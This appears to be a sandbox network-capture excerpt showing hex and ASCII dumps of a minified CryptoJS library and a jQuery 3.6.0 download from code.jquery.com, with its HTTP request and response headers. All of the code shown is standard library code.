                                                                                  2025-01-07 18:49:03 UTC404INData Raw: 37 62 65 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                  Data Ascii: 7bec!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65
                                                                                  Data Ascii: =typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Obje
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f
                                                                                  Data Ascii: clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.rando
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61
                                                                                  Data Ascii: g"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45
                                                                                  Data Ascii: ){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c
                                                                                  Data Ascii: 0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e
                                                                                  Data Ascii: .buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={strin
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a
                                                                                  Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJ
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72
                                                                                  Data Ascii: a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                                  2025-01-07 18:49:03 UTC1369INData Raw: 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c
                                                                                  Data Ascii: ,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.649734151.101.2.1374436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:03 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                  Host: code.jquery.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:03 UTC613INHTTP/1.1 200 OK
                                                                                  Connection: close
                                                                                  Content-Length: 89501
                                                                                  Server: nginx
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                  ETag: "28feccc0-15d9d"
                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                  Accept-Ranges: bytes
                                                                                  Age: 1760269
                                                                                  Date: Tue, 07 Jan 2025 18:49:03 GMT
                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740055-EWR
                                                                                  X-Cache: HIT, HIT
                                                                                  X-Cache-Hits: 2774, 0
                                                                                  X-Timer: S1736275743.087769,VS0,VE1
                                                                                  Vary: Accept-Encoding
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                  2025-01-07 18:49:03 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
